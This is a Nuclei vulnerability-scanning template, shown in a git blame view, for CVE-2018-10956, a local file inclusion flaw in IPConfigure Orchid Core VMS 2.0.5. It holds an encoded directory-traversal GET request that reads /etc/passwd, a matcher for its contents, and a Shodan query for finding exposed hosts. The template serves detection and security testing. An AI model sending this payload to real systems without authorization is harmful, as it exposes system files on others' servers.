nuclei-templates/http/cves/2018/CVE-2018-10956.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

2022-04-10 08:47:46 +00:00
id: CVE-2018-10956
2022-04-10 08:47:46 +00:00
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
2022-04-10 08:47:46 +00:00
author: 0x_Akoko
severity: high
2022-06-20 16:17:43 +00:00
description: |
IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
2023-09-06 12:57:14 +00:00
remediation: |
Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.
2022-04-10 08:47:46 +00:00
reference:
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
- https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
- https://www.exploit-db.com/exploits/44916/
- https://nvd.nist.gov/vuln/detail/CVE-2018-10956
2022-04-10 08:47:46 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-10 08:47:46 +00:00
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
2023-08-31 11:46:18 +00:00
epss-score: 0.65072
epss-percentile: 0.9751
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: ipconfigure
product: orchid_core_vms
2023-09-06 12:57:14 +00:00
shodan-query: http.title:"Orchid Core VMS"
tags: cve,cve2018,orchid,vms,lfi,edb
http:
2022-04-10 08:47:46 +00:00
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
2022-04-10 08:47:46 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-04-10 08:47:46 +00:00
- type: status
status:
- 200